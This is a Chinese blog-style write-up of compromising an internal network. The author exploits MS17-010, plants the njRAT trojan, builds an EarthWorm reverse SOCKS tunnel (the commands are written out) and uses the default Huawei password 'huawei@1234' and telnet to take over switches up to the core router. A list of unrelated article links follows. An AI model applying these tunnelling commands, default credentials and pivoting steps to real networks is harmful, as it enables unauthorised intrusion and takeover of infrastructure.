在对内网进行 ms17-010 扫描时,发现 2 台之前没有出现过且没有打补丁的主机,于是,尝试了一波

kali 主机在扫描时发现 2 台之前没有出现过且没有打补丁的主机

尝试打了一波

然后种了个 njrat

翻文件的时候发现了点配置文件

down 下来解压后发现是交换机的配置文件,于是有了一个大胆的想法

查看了被控主机的网络连接后,发现一个地址无法 ping 通,TCP 包也无法到达,推测做了 ACL

于是在被控机上搭了 earthworm 做转发

本机执行 ew -s rcsocks -l 本地代理端口 -e 远端连接端口

被控机执行 ew -s rssocks -d 主控机IP -e 远端连接端口

然后开启 proxifier 的代理功能,成功访问了那个系统,但这不是主要目的

在咨询了好哥们后,他建议尝试搞搞交换机看看

在对 10.2.66/24 网段扫描后发现 10.2.66.254 开放了 80 和 23 端口,尝试 xshell 连接

成功使用 huawei 密码 huawei@1234 连接,继续翻上级路由

发现了 10.2.20.1

继续 telnet

继续翻

发现 10.2.20.58

继续翻,翻到 10.4.0.1

继续 telnet

另外发现此时可以 ping 通 10.4.0.1 这台交换机

于是乎,扔浏览器打开看看

拿下后将本次收集到的密码与巡风扫描到的 telnet 主机进行爆破后发现了更多的交换机。。。。。。

复盘从一个监控主机到核心路由沦陷相关推荐

  1. 我们要的是一个简单的react-router路由

    我们要的是一个简单的react-router路由 习惯了 vue-router 路由的用法,再用react-router总感觉挺麻烦的. 那么react有没有用法跟vue-router一样使用简单的路 ...

  2. 使用抽象等设计工具创建一个稳固的核心机制

    使用抽象等设计工具创建一个稳固的核心机制,由此核心机制来带动业务处理,这样就可以把变化的业务隔离在核心机制之外,从而使业务的变化不影响(独立于)核心机制,这就像我们最早设计系统时要自己基于TCP/IP ...

  3. Golang Web入门(2):如何实现一个RESTful风格的路由

    Golang Web入门(2):如何实现一个RESTful风格的路由 摘要 在上一篇文章中,我们聊了聊在Golang中怎么实现一个Http服务器.但是在最后我们可以发现,固然DefaultServeM ...

  4. 怎样查看本机到一个网站经过多少路由节点?

    怎样查看本机到一个网站经过多少路由节点?一般路由节点数的多少决定了网络的稳定性,所以查询节点数能让我们及时了解到自己网络的情况.比如说我等百度没登上,我们可以通过节点数的反应请款来确定哪些节点链接超时 ...

  5. XRouter 一个轻量级的Android路由框架,基于ARouter上进行改良,优化Fragment的使用,可结合XPage使用

    XRouter 一个轻量级的Android路由框架,基于ARouter上进行改良,优化Fragment的使用,可结合XPage使用. 关于我 特征 由于是借鉴了ARouter,拥有ARouer所有特征 ...

  6. xpage 传参_一个轻量级的Android路由框架,基于ARouter上进行改良,优化Fragment的使用,可结合XPage使用。...

    XRouter 一个轻量级的Android路由框架,基于ARouter上进行改良,优化Fragment的使用,可结合XPage使用. 关于我 特征 由于是借鉴了ARouter,拥有ARouer所有特征 ...

  7. Angular核心-路由和导航

    Angular核心-路由和导航

  8. 今日头条创始人张一鸣:认知是一个人或一个公司的核心竞争力

    01 认知资源 昨天一大早,爱人说小其的体温又升了.小其昨晚发烧了,吃了退烧药后状态有所好转,一早测体温,又升了,得赶紧去医院. 这时6点,急匆匆地打个车到离家最近的三甲医院,谁知到了医院,护士说她们 ...

  9. 计算机路由表更新命令,计算机cmd命令之route,查看路由表,或配置一个更有效的路由...

    计算机cmd命令之route,在数据包没有有效传递的情况下,可以利用route命令查看路由表:或者使用该命令来确认为何选择此路径,而且可以配置一个更有效的路由. [开始]-[所有程序]-[附件]-[命 ...

最新文章

  1. LeetCode简单题之增量元素之间的最大差值
  2. @程序员:这些瓜没吃到,可以告别互联网了!
  3. 如何为linux释放内存和缓存
  4. Django - ORM - 事务, 乐观锁, 悲观锁
  5. html向上浮动的方式,JS 实现Div向上浮动的实现代码
  6. linux安装ld编译器,科学网—手动安装特定版本的gcc编译器 - 亓欣波的博文
  7. linux文件系统初始化过程(6)---执行init程序
  8. 激活函数详解/为什么要用激活函数
  9. sqlite配置选项
  10. js 递归树结构数组
  11. JavaMail入门第五篇 解析邮件
  12. div html 下边加横线_css字体下边横线 html超链接更改颜色和去掉下划线
  13. 为什么说每个软件工程师,都该懂大数据技术?
  14. 计算机正在准备从D盘中回收,电脑一直显示正在启动怎么选择重灌系统
  15. CAD图块无法分解怎么办?CAD块分解教程
  16. 防止网站被恶意镜像或反向代理方法
  17. 华为起诉最新进展,国内航司暂停运行有关客机,收买家庭不得继续抚养被解救儿童,脸书创始人后悔没早学微信,这就是今天的大新闻...
  18. 苏黎世联邦理工学院计算机怎么样,哪位大神知道苏黎世联邦理工学院怎么样?...
  19. 用户 不在 sudoers 文件中。此事将被报告
  20. C#调用GhostScript,O2S.Components转换PDF为图片

热门文章

  1. 栈顶指针到底指向哪_被称为“程序员试金石”的指针真的没有那么难!不信的话你来看看
  2. charles 手机抓包设置
  3. kotlin学习之数据类(七)
  4. Python网络爬虫从入门到实践 -- chapter 1 -- 网络爬虫入门
  5. 【最新合集】编译原理习题(含答案)_2程序设计语言及其文法_MOOC慕课 哈工大陈鄞
  6. [Leetcode总结] 101.对称二叉树
  7. 数据结构-数组模拟队列-环形实现(JAVA)
  8. Web前端开发笔记——第二章 HTML语言 第十节 画布标签、音视频标签
  9. 计算机linux入门教程,Turbolinux入门教程1
  10. 操作篇 ###rip协议学习和理解##